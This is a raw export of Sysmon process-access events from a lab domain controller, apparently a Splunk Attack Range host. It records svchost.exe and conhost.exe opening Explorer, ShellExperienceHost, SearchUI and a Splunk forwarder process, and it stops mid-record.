10341000x80000000000000001095198Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095197Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095196Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095195Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095194Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095193Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095192Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095191Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095190Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095189Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095188Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095187Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095186Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095185Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095184Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095183Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095182Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095181Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095180Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095179Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.305{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095178Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095177Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095176Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095175Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095174Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095173Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095172Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095171Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84D3-607D-0403-00000000BA01}372C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095170Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095169Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095168Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.304{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095167Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:20.249{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A7C-6080-9A5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095166Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 